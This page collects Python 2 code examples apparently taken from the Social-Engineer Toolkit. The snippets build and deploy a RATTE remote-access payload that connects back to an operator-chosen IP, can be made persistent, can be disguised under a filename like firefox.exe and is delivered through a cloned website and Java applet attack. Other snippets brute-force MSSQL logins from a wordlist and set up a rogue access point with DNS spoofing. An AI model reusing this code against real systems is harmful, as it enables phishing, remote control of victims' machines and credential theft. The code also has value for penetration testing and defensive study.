Beispiel #1
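def main():
    """Prompt for the RATTE settings, build the payload, optionally listen.

    Everything is read interactively with raw_input: the connect-back IP
    address, the port the RATTE server listens on, the persistence flag
    and an optional custom executable name. The values are passed to
    prepare_ratte(), and the operator is then asked whether
    ratte_listener_start() should be called on the chosen port.

    A non-numeric answer at either port prompt selects port 8080.
    """
    ############
    # get User Input
    ############
    ipaddr = raw_input(
        core.setprompt(["9", "2"], "IP address to connect back on"))
    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on")))
        # Accept only 1-65535. The previous check let negative numbers
        # through and warned about a "javaport" that does not exist in
        # this function.
        while ratteport < 1 or ratteport > 65535:
            core.PrintWarning('Port must be between 1 and 65535!')
            ratteport = int(
                raw_input(
                    core.setprompt(
                        ["9", "2"],
                        "Enter port RATTE Server should listen on")))
    except ValueError:
        # Non-numeric input at either prompt falls back to the default.
        ratteport = 8080

    # Only "no", "n" or an empty answer disables persistence; any other
    # input, including a typo, is treated as "YES".
    persistent = raw_input(
        core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    if persistent in ("no", "", "n"):
        persistent = "NO"
    else:
        persistent = "YES"

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.PrintStatus(
        "Payload has been exported to src/program_junk/ratteM.exe")

    ############
    # start ratteserver
    ############
    prompt = raw_input(
        core.setprompt(["9", "2"],
                       "Start the ratteserver listener now [yes|no]"))
    # An empty answer counts as "yes" here.
    if prompt in ("yes", "", "y"):
        core.PrintInfo("Starting ratteserver...")
        ratte_listener_start(ratteport)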
Beispiel #2
def scan(range, lowport, highport):
    """Run src.core.portscan.launch() over a range and report an empty result.

    Args:
        range: address range handed unchanged to portscan.launch(). The
            name shadows the builtin inside this function.
        lowport: first port of the port range, passed through unchanged.
        highport: last port of the port range, passed through unchanged.

    Returns:
        Whatever portscan.launch() returned, or False (after printing a
        warning) when that result compares equal to False.
    """
    # Imported at call time, as in the original; the alias keeps the
    # module and the scan result under different names.
    from src.core import portscan as portscan_module

    found = portscan_module.launch(range, lowport, highport)

    # Equality rather than identity on purpose: this keeps the original
    # comparison semantics for values such as 0.
    if found == False:
        setcore.PrintWarning(
            "No MSSQL servers were found in the ranges specified")
        return False

    return found
Beispiel #3
def launch(cidrBlock, lowport, highport):
    """Scan either a CIDR block or a single IP address.

    Args:
        cidrBlock: a CIDR block, or a single IP address when
            validateCIDRBlock() rejects it.
        lowport: first port of the range. Converted with int() only on
            the single-address path; printCIDR() receives it unchanged.
        highport: last port of the range, treated like lowport.

    Returns:
        host_list after a scan was started, or None when the input is
        neither a CIDR block nor a valid IP address. host_list is not
        assigned in this function; presumably scan()/printCIDR() fill
        it. Verify against the rest of the module.
    """
    setcore.PrintStatus(
        "SET is now scanning the IPs specified... please be patient.")

    if validateCIDRBlock(cidrBlock):
        printCIDR(cidrBlock, lowport, highport)
        return host_list

    # Not CIDR notation: accept the value only if it is one valid IP.
    if setcore.is_valid_ip(cidrBlock) != False:
        setcore.PrintStatus(
            "CIDR notation not specified. Trying single IP address.")
        scan(cidrBlock, int(lowport), int(highport))
        return host_list

    setcore.PrintWarning("Invalid IP Address, try again.")
    return None
Beispiel #4
def brute(ipaddr, username, port, wordlist):
    """Try every password in a wordlist against one MSSQL login.

    Args:
        ipaddr: target host; an empty string returns False at once.
        username: login name used for every attempt.
        port: port number, appended to ipaddr as "host:port".
        wordlist: path to a file with one candidate password per line,
            or "default" for src/fasttrack/wordlist.txt.

    Returns:
        "ipaddr,username,port,password" for the first password that
        _mssql.connect() accepts, otherwise False.

    Review notes (defender's view):
        * Each wordlist line is a separate connection attempt for the
          same account from the same source, so a run shows up as a
          burst of failed logins where failed-login auditing is enabled
          on the server; account lockout and source rate limiting
          throttle it.
        * Candidate passwords, and the working one on success, are
          printed in clear text to the console.
    """
    # if ipaddr being passed is invalid
    if ipaddr == "":
        return False
    if ipaddr != "":
        # base counter for successful brute force
        counter = 0
        # build in quick wordlist
        if wordlist == "default":
            wordlist = "src/fasttrack/wordlist.txt"

        # read in the file
        # NOTE(review): this file handle is never closed.
        password = file(wordlist, "r")
        for passwords in password:
            passwords = passwords.rstrip()
            # try actual password
            try:
                print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
                # connect to the sql server and attempt a password
                # NOTE(review): the connection object is neither closed
                # nor returned after a successful login.
                target_server = _mssql.connect(ipaddr + ":" + str(port),
                                               username, passwords)
                # print that we were successful
                setcore.PrintStatus(
                    "\nSuccessful login with username %s and password: %s" %
                    (username, passwords))
                counter = 1
                break

            # if invalid password
            # NOTE(review): every exception is swallowed here, so a
            # network error or timeout is indistinguishable from a
            # rejected password.
            except Exception, e:
                pass

        # if we brute forced a machine
        if counter == 1:
            return ipaddr + "," + username + "," + str(port) + "," + passwords
        # else we didn't and we need to return False
        else:
            # this inner check is always true here: the empty-ipaddr
            # case already returned at the top of the function
            if ipaddr != '':
                setcore.PrintWarning(
                    "Unable to guess the SQL password for %s with username of %s"
                    % (ipaddr, username))
            return False
Beispiel #5
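def main():
    """Run the interactive RATTE workflow that uses the Java applet vector.

    Prompts for the website to clone, the connect-back IP address, the
    applet port, the RATTE server port, the persistence flag and an
    optional custom executable name. It then calls prepare_ratte() and
    java_applet_attack_tw(), copies src/program_junk/ratteM.exe into
    reports/ under the name read from src/program_junk/rand_gen, starts
    the listener with ratte_listener_start() and finally calls
    stop_web_server_tw().

    Non-numeric port input falls back to 80 (applet) and 8080 (RATTE).
    """
    website = raw_input(
        core.setprompt(["9", "2"],
                       "Enter website to clone (ex. https://gmail.com)"))
    ipaddr = raw_input(
        core.setprompt(["9", "2"], "Enter the IP address to connect back on"))

    # Original author's note: javaport must be 80, because the applet
    # uses port 80 in the web injection to download the payload. The
    # prompt below nevertheless accepts any port in 1-65535.
    try:
        javaport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port java applet should listen on (ex. 443)")))
        # Reject negative numbers too, and say why the prompt repeats.
        while javaport < 1 or javaport > 65535:
            core.PrintWarning("Port must be between 1 and 65535!")
            javaport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Enter port java applet should listen on")))
    except ValueError:
        javaport = 80

    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on")))
        # The two services cannot share a port, and the value must be a
        # valid TCP port; the warning now names both conditions.
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            core.PrintWarning(
                "Port must be between 1 and 65535 and must not be equal to javaport!")
            ratteport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Port RATTE Server should listen on")))
    except ValueError:
        ratteport = 8080

    # Only "no", "n" or an empty answer disables persistence.
    persistent = raw_input(
        core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    if persistent in ("no", "", "n"):
        persistent = "NO"
    else:
        persistent = "YES"

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.PrintInfo("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # The last line of rand_gen is the file name used under reports/.
    # NOTE(review): if rand_gen is empty, ratte_random is never bound and
    # the copy below raises NameError.
    fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
    try:
        for line in fileopen:
            ratte_random = line.rstrip()
    finally:
        fileopen.close()

    # Argument list instead of a shell string: paths containing spaces
    # or shell metacharacters are passed to cp verbatim, not interpreted.
    subprocess.Popen([
        "cp",
        "%s/src/program_junk/ratteM.exe" % (definepath),
        "%s/reports/%s" % (definepath, ratte_random),
    ]).wait()

    #######################
    # start ratteserver
    #######################

    core.PrintInfo("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()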
Beispiel #6
    if match2:
        # replace line and define ap_channel
        ap_channel = line.replace("AP_CHANNEL=", "")
        # default if not found
        if ap_channel == "": ap_channel = "9"

    # look for dnsspoof
    match3 = re.search("DNSSPOOF_PATH=", line)
    if match3: dnsspoof_path = line.replace("DNSSPOOF_PATH=", "")

# The configured dnsspoof path is missing: fall back to
# /usr/local/sbin/dnsspoof, or warn and call ExitSet() if that file is
# absent as well.
if not os.path.isfile(dnsspoof_path):
    if not os.path.isfile("/usr/local/sbin/dnsspoof"):
        setcore.PrintWarning(
            "DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
        )
        ExitSet()
    else:
        dnsspoof_path = "/usr/local/sbin/dnsspoof"

# Use the airbase-ng copy under src/wireless/ when the configured path
# does not point at a file.
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"

# Tell the operator which manual edit comes next.
setcore.PrintInfo(
    "For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface."
)
setcore.PrintInfo(
    """This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
print("")
setcore.PrintStatus("SET will now launch nano to edit the file.")
setcore.PrintStatus(
    "Press ^X to exit nano and don't forget to save the updated file!")
Beispiel #7
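# Read config/set_config line by line and pick up the UPX settings and
# the interactive-shell switch. Keys are matched with re.search, so a
# key is found anywhere in a line, not only at its start.
fileopen = file("config/set_config", "r")
try:
    for line in fileopen:
        line = line.rstrip()
        # define if we use upx encoding or not
        match = re.search("UPX_ENCODE=", line)
        if match:
            upx_encode = line.replace("UPX_ENCODE=", "")
        # set the upx flag
        # NOTE(review): upx_encode is only bound once a UPX_ENCODE= line
        # has been seen; a config that lists UPX_PATH= first raises
        # NameError on the comparison below.
        match1 = re.search("UPX_PATH=", line)
        if match1:
            upx_path = line.replace("UPX_PATH=", "")
            if upx_encode == "ON" and not os.path.isfile(upx_path):
                setcore.PrintWarning(
                    "UPX packer not found in the pathname specified in config. Disabling UPX packing for executable"
                )
                # Was `upx_encode == "OFF"`, a comparison whose result
                # was discarded, so packing stayed enabled despite the
                # warning.
                upx_encode = "OFF"
        # if we removed the set shells to free up space, needed for pwniexpress
        match2 = re.search("SET_INTERACTIVE_SHELL=", line)
        if match2:
            line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
            if line == "off":
                sys.exit(
                    "\n   [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config"
                )
finally:
    # Close the handle on every path, including the sys.exit() above.
    fileopen.close()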

# make directory if it's not there
if not os.path.isfile("src/program_junk/web_clone/"):
    subprocess.Popen("mkdir src/program_junk/web_clone/",
                     stdout=subprocess.PIPE,
Beispiel #8
        answer5 = raw_input(core.setprompt("0", "City"))
        # generate the request crl
        subprocess.Popen(
            'keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"'
            % (answer1, answer2, answer3, answer4, answer5),
            shell=True).wait()
        core.PrintInfo("Exporting the cert request to text file...")
        # generate the request and export to certreq
        subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" %
                         (definepath),
                         shell=True).wait()
        core.PrintStatus(
            "Export successful. Exported certificate under the SET root under certreq.txt"
        )
        core.PrintWarning(
            "You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc."
        )
        core.PrintWarning(
            "Be sure to purchase a code signing certificate, not a normal website SSL certificate."
        )
        core.PrintInfo("When finished, enter the path to the .cer file below")
        # cert_path is used for the certificate path when generating

        cert_path = raw_input(
            core.setprompt(
                "0", "Path for the code signing certificate file (.spc file)"))
        # if we can't find the filename
        if not os.path.isfile(cert_path):
            while 1 == 1:
                core.PrintError("ERROR:Filename not found. Please try again.")
                # re-prompt if file name doesn't exist
Beispiel #9
            print line

print "\n  99. Return to the previous menu\n"
choice = raw_input(setcore.setprompt(["9"], ""))

if choice == 'exit':
    setcore.ExitSet()

if choice == '99':
    menu_return = "true"

# throw error if not integer
try:
    choice = int(choice)
except:
    setcore.PrintWarning("An integer was not used try again")
    choice = raw_input(setcore.setprompt(["9"], ""))

# start a new counter to match choice
counter = 0

if menu_return == "false":
    # pull any files in the modules directory that starts with .py
    for name in glob.glob("modules/*.py"):

        counter = counter + 1

        if counter == int(choice):
            # get rid of .modules extension
            name = name.replace("modules/", "")
            # get rid of .py extension
Beispiel #10
        # Web Attack menu choice 9: Create or Import a CodeSigning Certificate
        if attack_vector == '9':
            sys.path.append("src/html/unsigned")
            try: reload(verified_sign)
            except: import verified_sign
        # Web Attack menu choice 9: Return to the Previous Menu 
        if attack_vector == '99': break

        # Web Attack menu choice 7: Multi-Attack Web Method
        if attack_vector == "7":
            fileopen = file("config/set_config","r")
            for line in fileopen:
                line = line.rstrip()
                match = re.search("APACHE_SERVER=ON",line)
                if match:
                    setcore.PrintWarning("Apache mode is set to ON, you cannot use Multi-Attack Mode with Apache")
                    setcore.PrintWarning("Turn off APACHE_SERVER=ON in the SET_CONFIG and relaunch SET")
                    attack_vector = "30"

        try:
            attack_check = int(attack_vector)
        except: 
            setcore.PrintError("ERROR:Invalid selection, going back to menu.")
            break
        if attack_check > 9:
                raw_input("\n Invalid option. Press (return) to continue.")
                break
        # Web Attack menu choice 5: Man Left in the Middle Attack Method
        if attack_vector == "5": choice3='0'
        if attack_vector != "5":
Beispiel #11
                    sql_servers = sql_servers.split(",")
                    # start loop and brute force
                    for servers in sql_servers:
                        # this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
                        if servers != "":
                            sql_success = mssql.brute(servers, username, port,
                                                      wordlist)
                            if sql_success != False:
                                # after each success or fail it will break into this to the above with a newline to be parsed later
                                master_list = master_list + sql_success + ":"
                                counter = 1

# if we didn't successful attack one
                if counter == 0:
                    setcore.PrintWarning(
                        "Sorry. Unable to locate or fully compromise a MSSQL Server."
                    )
                    pause = raw_input(
                        "Press {return} to continue to the main menu.")
                # if we successfully attacked one
                if counter == 1:
                    # need to loop to keep menu going
                    while 1:
                        # set a counter to show compromised servers
                        counter = 1
                        # here we list the servers we compromised
                        master_names = master_list.split(":")
                        setcore.PrintStatus(
                            "Select the compromise SQL server you want to interact with:\n"
                        )
                        for success in master_names: